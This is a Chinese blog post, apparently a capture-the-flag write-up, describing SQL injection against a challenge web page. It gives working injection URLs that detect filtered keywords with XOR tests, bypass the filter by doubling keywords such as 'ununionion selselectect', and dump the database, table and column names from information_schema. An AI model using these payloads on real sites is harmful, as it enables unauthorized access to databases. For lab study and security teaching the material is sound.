版权声明:本文为博主原创文章,转载需注明出处。 https://blog.csdn.net/zz_Caleb/article/details/84981064
进去看到url感觉是sql注入,
加上',报错但是%23不报错,加上'--+,也不报错,说明可以用--+注释
加上' or 1=1--+,报错
尝试' oorr 1=1--+,正常
说明or被过滤了.
那么怎么判断哪些关键字被过滤了呢,这里用到异或注入(同真异假)。
http://120.24.86.145:9004/1ndex.php?id=1'^(length('union')!=0)--+
如果返回正常说明union被过滤了。
这样尝试出来被过滤的关键字:union、select、and、or、(order、information中含or)
由最上面知道双写可以绕过过滤
猜字段数
http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 2 --+ 正常
http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 3 --+ 报错
暴库:
id=-1' ununionion selselectect 1,batabase()--+
web1002-1
暴表:123.206.87.240:9004/1ndex.php?id=-1' ununionion selselectect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema='web1002-1'--+
flag1
爆列名:
123.206.87.240:9004/1ndex.php?id=-1' ununionion selselectect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name='flag1'--+
flag1,address
下一阶段如果爆出flag1,会出来一串字符
尝试爆出address的话出现下一关地址,进入下一关